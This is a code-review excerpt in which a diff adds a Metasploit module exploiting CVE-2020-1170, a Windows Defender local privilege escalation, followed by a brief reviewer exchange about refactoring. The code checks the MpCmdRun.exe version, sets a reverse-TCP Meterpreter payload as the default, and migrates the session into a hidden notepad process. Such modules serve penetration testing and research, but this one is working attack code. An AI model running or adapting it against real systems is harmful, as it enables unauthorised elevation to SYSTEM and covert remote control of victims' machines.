modules/exploits/windows/local/cve_2020_1170_windows_defender_lpe.rb

```diff
@@ -0,0 +1,174 @@
+                ['URL', 'https://googleprojectzero.blogspot.com/2018/04/windows-exploitation-tricks-exploiting.html'],
+              ],
+          'Notes' =>
+              {
+                'SideEffects' => [ ARTIFACTS_ON_DISK ],
+                'Reliability' => [ REPEATABLE_SESSION ],
+                'Stability' => [ CRASH_SAFE ]
+              },
+          'DefaultOptions' =>
+              {
+                'EXITFUNC' => 'thread',
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
+                'WfsDelay' => 900
+              }
+        )
+    )
+  end
+
+  def check
+    sysinfo_value = sysinfo['OS']
+
+    if sysinfo_value !~ /windows/i
+      # Non-Windows systems are definitely not affected.
+      return CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!')
+    end
+
+    mprun_file_version = file_version('C:\\Program Files\\Windows Defender\\MpCmdRun.exe')
+    mprun_file_version.pop # Remove last element, the branch. We aren't interested in it.
+    gem_version_mpfile = Gem::Version.new(mprun_file_version.join('.')) # Taken from https://stackoverflow.com/questions/4018689/ruby-combining-an-array-into-one-string
+    print_status("Version #{gem_version_mpfile} of MpCmdRun.exe detected on target!")
+    if gem_version_mpfile >= Gem::Version.new('4.18.2005.1')
+      return CheckCode::Safe
+    else
+      signature_update_command_result = cmd_exec('C:\\Program Files\\Windows Defender\\MpCmdRun.exe -SignatureUpdate')
+      if signature_update_command_result =~ /800106BA/ # Error code 0x800106BA occurs when another security product is installed according
+        # to https://answers.microsoft.com/en-us/windows/forum/windows_vista-security/windows-defender-error-0x800106ba/0e2f4e98-4e5f-4991-8994-0f8c80784547
+        print_error('The target has an outdated version of MpCmdRun.exe installed but they have another AV installed.')
+        return CheckCode::Safe
+      else
+        print_good('Target appears to have an outdated version of MpCmdRun.exe that is being actively used.')
+        return CheckCode::Appears
+      end
+    end
+  end
+
+  def launch_background_injectable_notepad_and_migrate
+    print_status('Launching notepad to continue executing Powershell commands to write to the file without things failing...')
+    notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true)
+    process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+    print_good("Process #{process.pid} launched.")
+    session.migrate(process.pid)
+    process.pid
+  rescue Rex::Post::Meterpreter::RequestError
+    # Sandboxes could not allow to create a new process
+    # stdapi_sys_process_execute: Operation failed: Access is denied.
+    print_error('Operation failed. Trying to elevate the current process...')
+    process = client.sys.process.open
+    session.migrate(process.pid)
+    process.pid
+  end
+
+  def make_directory_junction
```

Comment:
This method should take two arguments for easy copypasta for future use.

Reply:
Implemented, thanks for the suggestion 👍